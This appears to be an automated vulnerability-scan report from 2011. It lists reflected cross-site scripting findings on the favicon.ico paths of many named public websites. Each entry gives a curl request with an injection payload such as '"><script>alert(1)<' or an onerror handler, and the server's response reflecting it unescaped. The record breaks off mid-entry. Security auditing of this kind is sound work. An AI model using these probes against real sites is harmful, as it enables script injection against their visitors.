HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:36:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 1173 Content-Type: text/html <html> <head><title>Page not Found on elyrics.net</title> <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"> </head> <body><h1>Error 404 Page not Found</h1> <a href="/"><img src="http://a527.ac ...[SNIP]... <font color=red>/favicon.ico7526b<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.elyricsworld |
Path: | /favicon.ico |
GET /favicon.ico66975</title><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.elyricsworld.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 20:22:08 GMT Server: Apache/2.2.17 (Unix) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 1419 Content-Type: text/html <html> <head> <title>/favicon.ico66975</title><script <meta name="robots" content="noindex"> <style type="text/css"> body { ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.elyricsworld |
Path: | /favicon.ico |
GET /favicon.ico4097f<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.elyricsworld.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 20:22:08 GMT Server: Apache/2.2.17 (Unix) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 1403 Content-Type: text/html <html> <head> <title>/favicon.ico4097f <meta name="robots" content="noindex"> <style type="text/css"> body { fo ...[SNIP]... <h1>/favicon.ico4097f<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.elyricsworld |
Path: | /favicon.ico |
GET /favicon.ico?4ae7d</title><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.elyricsworld.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 20:22:04 GMT Server: Apache/2.2.17 (Unix) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 1425 Content-Type: text/html <html> <head> <title>/favicon.ico?4ae7d</title><script <meta name="robots" content="noindex"> <style type="text/css"> body ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.elyricsworld |
Path: | /favicon.ico |
GET /favicon.ico?48892<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.elyricsworld.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 20:22:03 GMT Server: Apache/2.2.17 (Unix) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 1409 Content-Type: text/html <html> <head> <title>/favicon.ico?48892 <meta name="robots" content="noindex"> <style type="text/css"> body { ...[SNIP]... <h1>/favicon.ico?48892<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.everydayhealth |
Path: | /favicon.ico |
GET /favicon.icocc61f'%3bd646a62950f HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.everydayhealth.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 File Not Found Date: Sat, 02 Apr 2011 13:27:14 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB07 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=Acwny Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 16304 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gamespot.com |
Path: | /favicon.ico |
GET /favicon.ico95cd8"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.gamespot.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:27:07 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.2.5 Set-Cookie: geolocn=MTczLjE5My4y Set-Cookie: ctk=NGQ5NzI0MmJhZGMx Set-Cookie: gspot_side_040211=1; expires=Tue, 05-Apr-2011 13:27:07 GMT; path=/; domain=.gamespot.com Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com Content-Type: text/html; charset=ISO-8859-1 Content-Length: 34823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.gamespot ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gamestop.com |
Path: | /favicon.ico |
GET /favicon.ico599e8'a%3d'b'629f0608bc6 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.gamestop.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found X-Cnection: close Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sat, 02 Apr 2011 13:33:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 13:33:25 GMT; path=/ Set-Cookie: CookieState=V=1; path=/ Set-Cookie: LandingUrl=http://www Set-Cookie: CampaignHistory=; path=/ Set-Cookie: BIGipServerwww.gamestop Content-Length: 181788 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <script language='jav ...[SNIP]... <a href='/Profiles/Login ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /favicon.ico |
GET /12711<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.gather.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:22 GMT Server: Apache/2.2.3 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=4A24C55EA Set-Cookie: vis=RyOcPuDxMFUGP3B0 P3P: policyref="http://ads Set-Cookie: vis=KW1zZbLcDLkbttCj P3P: policyref="http://ads Content-Length: 17544 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>12711<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
Path: | /favicon.ico |
GET /3197c"><a>1af48c031bb HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.gather.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:05 GMT Server: Apache/2.2.3 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=DA1461106 Set-Cookie: vis=UjjmQmSy0/vTCt18 P3P: policyref="http://ads Set-Cookie: vis=3O1JaJHhBrlqO2Hs P3P: policyref="http://ads Content-Length: 17459 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta name="keywordVal" content="3197c"><a>1af48c031bb" > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gourmandia.com |
Path: | /favicon.ico |
GET /favicon.ico98084"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.gourmandia.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:57:51 GMT Server: Apache Set-Cookie: PHPSESSID=m5h7u4477a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>4 ...[SNIP]... <form id="testform" action="/404.php/favicon ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.healthline.com |
Path: | /favicon.ico |
GET /favicon.ico6e4f5'%3bd3fe8a4b78d HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.healthline.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/html;charset=UTF-8 Date: Sat, 02 Apr 2011 13:41:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51348 <!-- URI: /favicon.ico6e4f5' --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> < ...[SNIP]... anguage="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.healthline.com |
Path: | /favicon.ico |
GET /favicon.ico7c252"%3b2599a835db0 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.healthline.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/html;charset=UTF-8 Date: Sat, 02 Apr 2011 13:41:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51348 <!-- URI: /favicon.ico7c252" --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> < ...[SNIP]... cadc=0;var erpm=0; /*var unicaEvents = new Array(); var unicaEventIdx = 0;*/ var g_cfn="generalhealth"; var g_cfn_bold = "generalhealth"; var g_encoded_uri = encodeURI("/favicon.ico7c252";2599a835db0"); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hollywood.com |
Path: | /favicon.ico |
GET /favicon.ico2d966%2522%253balert User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.hollywood.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:35:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 15980 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Hollywood.com </title> <script type="text ...[SNIP]... function _hbEvent(a,b){b=_hbE[ var hbx=_hbEvent("pv");hbx hbx.acct="DM550817IO hbx.pn="404/favicon.ico2d966";alert(1)/ hbx.mlc="Error";hbx.pndef hbx.dlf="n"; </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.inc.com |
Path: | /favicon.ico |
GET /favicon.ico4b186"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.inc.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:20:54 GMT Server: VoxCAST X-Powered-By: PHP/5.2.11 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from VoxCAST Content-Length: 40001 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" name="returl" value="http://www.inc.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instructables |
Path: | /favicon.ico |
GET /favicon.ico492f7<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.instructables.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Resin/3.0.28 P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA Cache-Control: no-cache X-Cacheable: no-404 Content-Length: 17716 Date: Sat, 02 Apr 2011 13:37:19 GMT X-Varnish: 4085213196 Age: 0 Via: 1.1 varnish X-Cache-Svr: squid03.instructables.com X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <p> We're sorry, the URL http://www.instructables </p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kaboose.com |
Path: | /favicon.ico |
GET /favicon.icof4633</script><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.kaboose.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:40:52 GMT Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9 X-Powered-By: PHP/4.4.9 Set-Cookie: ad_types_404.html=itype Content-Type: text/html; charset=utf-8 X-UA-COMPATIBLE: IE=EmulateIE7 Content-Length: 86182 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <he ...[SNIP]... <script type="text/javascript"> mboxCreate('KAB_Global </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.letssingit.com |
Path: | /favicon.ico |
GET /favicon.icoc0854"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.letssingit.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:59:11 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com Set-Cookie: session_views=1; path=/; domain=.letssingit.com Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 22702 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE> <META http-equiv="content-type" content="tex ...[SNIP]... <img src="http://b.scorec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.letssingit.com |
Path: | /favicon.ico |
GET /favicon.icocc674"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.letssingit.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:59:12 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com Set-Cookie: session_views=1; path=/; domain=.letssingit.com Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 22681 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE> <META http-equiv="content-type" content="tex ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mainstreet.com |
Path: | /favicon.ico |
GET /favicon.icof5ac2"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mainstreet.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:04:47 GMT Server: Apache Set-Cookie: SESS0e250a232fad80ec Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 02 Apr 2011 14:04:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 X-Debug: msweb04 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- Node type: site_content (4100) Node title: 404 Page Last Generated: 20110 ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.manta.com |
Path: | /favicon.ico |
GET /favicon.icof6ae0<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.manta.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 403 Access Denied Server: nginx/0.7.62 Date: Sat, 02 Apr 2011 12:43:10 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding Content-Length: 4714 X-Varnish: 2363475455 Via: 1.1 varnish X-Served-By: ecnext42 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <br> Access Denied: http://www.manta.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.manta.com |
Path: | /favicon.ico |
GET /favicon.ico56d5c"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.manta.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 403 Access Denied Server: nginx/0.7.62 Date: Sat, 02 Apr 2011 12:43:10 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding Content-Length: 4718 X-Varnish: 2363475440 Via: 1.1 varnish X-Served-By: ecnext42 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:webmaster ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.manta.com |
Path: | /favicon.ico |
GET /favicon.ico?b779f<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.manta.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 403 Access Denied Server: nginx/0.7.62 Date: Sat, 02 Apr 2011 12:42:43 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding Content-Length: 4720 X-Varnish: 3115951942 Via: 1.1 varnish X-Served-By: ecnext41 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <br> Access Denied: http://www.manta.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.manta.com |
Path: | /favicon.ico |
GET /favicon.ico?c655a"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.manta.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 403 Access Denied Server: nginx/0.7.62 Date: Sat, 02 Apr 2011 12:42:43 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding Content-Length: 4724 X-Varnish: 1295727862 Via: 1.1 varnish X-Served-By: ecnext43 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:webmaster ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.marthastewart |
Path: | /favicon.ico |
GET /4257a"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.marthastewart.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 Last-Modified: Sat, 02 Apr 2011 13:34:25 +0000 ETag: "1301751265" Content-Type: text/html; charset=utf-8 X-Ttl: 14400.000 ntCoent-Length: 21362 X-Varnish: 1769286479 X-Req-Grace: 20.000 Cache-Control: private, max-age=0 Expires: Sat, 02 Apr 2011 13:34:26 GMT Date: Sat, 02 Apr 2011 13:34:26 GMT Content-Length: 21362 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... mniturePageName="page not found"; s.server="www.martha s.pageType=""; s.prop1=""; s.prop3=""; s.prop4="channel"; s.prop5=""; s.prop6=""; s.prop7=""; s.prop12="http://www s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop17=""; s.prop18=""; s.prop19=""; s.prop20=""; s.prop21=""; s.prop22=""; s.prop23=""; s.prop24=""; s.prop25=""; s.prop26=""; s.prop27="logged ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mayoclinic.com |
Path: | /favicon.ico |
GET /favicon.icoe0c3e%2527%253balert User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mayoclinic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 file not found Connection: close Date: Sat, 02 Apr 2011 13:26:15 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=6783630;domain= Set-Cookie: CFTOKEN=43948287;domain= Set-Cookie: JSESSIONID=c230d0ddc Set-Cookie: CURRENTFARCRYPROJECT Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html> <head> <title>Page not found - MayoClinic.com</title> <meta name="description" conten ...[SNIP]... '; OAS_listpos = 'Bottom,Position4'; OAS_query = 'E1ED5C92-F149-7785 OAS_target = '_top'; //end of configuration OAS_version = 10; OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); fun ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mayoclinic.com |
Path: | /favicon.ico |
GET /favicon.ico?4174f'%3balert(1)/ User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mayoclinic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 file not found Connection: close Date: Sat, 02 Apr 2011 13:25:41 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=56390739;domain= Set-Cookie: CFTOKEN=78178525;domain= Set-Cookie: JSESSIONID=8030c0b06 Set-Cookie: CURRENTFARCRYPROJECT Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html> <head> <title>Page not found - MayoClinic.com</title> <meta name="description" conten ...[SNIP]... ; OAS_listpos = 'Bottom,Position4'; OAS_query = 'E1ED5C92-F149-7785 OAS_target = '_top'; //end of configuration OAS_version = 10; OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mayoclinic.com |
Path: | /favicon.ico |
GET /favicon.ico?506b0"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mayoclinic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 file not found Connection: close Date: Sat, 02 Apr 2011 13:25:40 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=21707428;domain= Set-Cookie: CFTOKEN=48294501;domain= Set-Cookie: JSESSIONID=f4308d3d1 Set-Cookie: CURRENTFARCRYPROJECT Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html> <head> <title>Page not found - MayoClinic.com</title> <meta name="description" conten ...[SNIP]... <script> COMSCORE.beacon({ c1:2, c2:"6035818", c3:"6035818", c4:"http://www.mayoclinic c5:"", c6:"", c15:"" }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mediaite.com |
Path: | /favicon.ico |
GET /favicon.ico3f883"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mediaite.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:18:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Vary: Cookie Set-Cookie: PHPSESSID=3qrq02pgj5 Set-Cookie: wordpress_test_cookie=WP Set-Cookie: wordpress_test_cookie=WP X-Pingback: http://www.mediaite.com Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 02 Apr 2011 14:18:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34022 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <form method="post" action="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.motime.com |
Path: | /favicon.ico |
GET /favicon.icob6b98"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.motime.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx/0.7.63 Date: Sat, 02 Apr 2011 13:58:08 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.2.12-pl0-gentoo Edge-control: bypass-cache=on Set-Cookie: trkdada=x3UsGU2XK3CF P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Content-Length: 34371 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="returnurl" value="/favicon.icob6b98"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.motime.com |
Path: | /favicon.ico |
GET /favicon.ico34891</script><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.motime.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx/0.7.63 Date: Sat, 02 Apr 2011 13:58:22 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.2.12-pl0-gentoo Edge-control: bypass-cache=on Set-Cookie: trkdada=x3UsK02XK35z P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Content-Length: 34334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <script type="text/javascript"> _dadanet.registerStartup( ['classes/FormManager', 'classes/CommObjects'], function() { var co_opts = { uri: 'http://www.motime.com dict:{ 'op_in_progress_desc': '', 'is_friend': 'We are friends', 'invite_already_send': 'Invite already sent', 'invite_send': 'Invitation sent', 'invite_blocked': 'Invites blocked by user', 'is_fan' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mp3raid.com |
